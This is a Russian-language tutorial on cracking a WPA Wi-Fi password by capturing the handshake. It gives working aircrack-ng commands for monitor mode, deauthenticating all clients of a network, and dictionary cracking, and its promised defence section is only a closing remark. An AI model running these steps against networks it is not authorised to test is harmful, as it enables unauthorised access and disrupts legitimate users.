Взлом пароля Wi-Fi. Атака «захват рукопожатия». Реализация и защита

Взлом пароля Wi-Fi — очень распространённая задача и потому способов взлома существует великое множество, при этом каждый сам для решает зачем ему это нужно, надеюсь, осознавая риски, ведь в некоторых случаях это может быть незаконно. Я же, в целях повышения общего уровня понимания основ информационной безопасности и просто в образовательных целях расскажу об одном из способов взлома, а именно «захвате рукопожатия».

Для тех кто сам не догадался, поясню что в этом материале будут использоваться возможности Kali Linux, хотя бы потому, что там уже предустановлены все утилиты которые нам понадобятся. Итак начнем.

Шаг 1. Определите сетевой интерфейс.

В терминале вводим команду iwconfig

iwconfig

В большинстве случаев вы увидите результат wlan0 — это беспроводной интерфейс (eth0 — проводной)

Шаг 2. Перевести сетевую карту в режим мониторинга

В обычной ситуации наша сетевая карта получает трафик только для своего MAC-адреса, чтобы увидеть весь трафик находящийся, так сказать, «в воздухе», нужно перевести нашу карту в режим мониторинга, для этого используем команду:

airmon-ng start wlan0

где wlan0 — это наша сетевая карта

monitoring mode

Также обратите внимание, что после выполнения airmon-ng start wlan0 наш сетевой интерфейс был переименован в wlan0mon, дальше мы будем использовать уже его

Шаг 3. Находим беспроводные сети

Теперь нужно ввести команду:

airodump-ng wlan0mon

после выполнения которой мы увидим все беспроводные сети в радиусе действия нашего адаптера:

kali linux

здесь нас будут интересовать такие параметры:

  • BSSID — MAC-адрес
  • CH — канал
  • ESSID — имя сети

Для этого теста я создал сеть home33 и именно на ней мы будем экспериментировать.

Шаг 4. Запускаем утилиту airodump-ng

Чтобы начать анализировать интересующую нас сеть необходимо опять запустить утилиту airodump-ng, но уже с другими параметрами:

airodump-ng --bssid 08:86:30:74:22:76 -c 1 --write home33 wlan0mon
  • —bssid — mac-адрес интересующей нас сети
  • -c — канал на котором она работает
  • —write — указываем название файла, куда будут сохранятся результаты
  • wlan0mon — сетевой интерфейс
kali linux

Шаг 4. Деаутентификация пользователя и захват handshake

Теперь пришло время перехватить handshake, да вот только сделать это мы можем только, когда пользователь введёт пароль сети, ждать пока он это сделает сам можно долго, поэтому надо ему помочь:

aireplay-ng --deauth 100 -a 08:86:30:74:22:76 wlan0mon
  • —deauth — количество фреймов которые вы хотите направить для аутентификации
  • -a — mac-адрес

Мы принудительно отключили всех пользователей от Wi-Fi сети и теперь нужно подождать пока кто-нибудь повторно подключится. Как только это произойдет в правом верхнем углу нашего терминала появится надпись: WPA handshake

kali linux

Это означает, что произошёл захват рукопожатия. И, в принципе, пароль уже у нас, правда в зашифрованном виде.

Шаг 5. Расшифровка

Для расшифровки мы будем использовать утилиту aircrak:

aircrack-ng home33-01.cap -w pss

home33-01.cap — файл с сохраненным паролем
-w имя_файла — файл словаря для перебора пароля, можно создать свой, если есть информация о хозяине сети и предположения какие данные он мог использовать в качестве пароля, если нет, то в интернете полно готовых словарей.

Для тех кто хочет поэкспериментировать, неплохой словарь можно скачать здесь: https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

Запускаем и спустя какое-то время (всё зависит от сложности пароля) получаем результат:

hacking

Пароль найден. Этот способ достаточно эффективен хотя бы потому, что большинство пользователей уделяет очень мало внимания безопасности своей сети, все помнят про антивирусы, некоторые даже слышали про фаерволы, но мало кто утруждает себя обновить прошивку на роутере или придумать сложный пароль от Wi-Fi. А ведь когда хакер окажется в одной сети с жертвой…. хотя об этом поговорим в другой статье.

Твой Pul$e.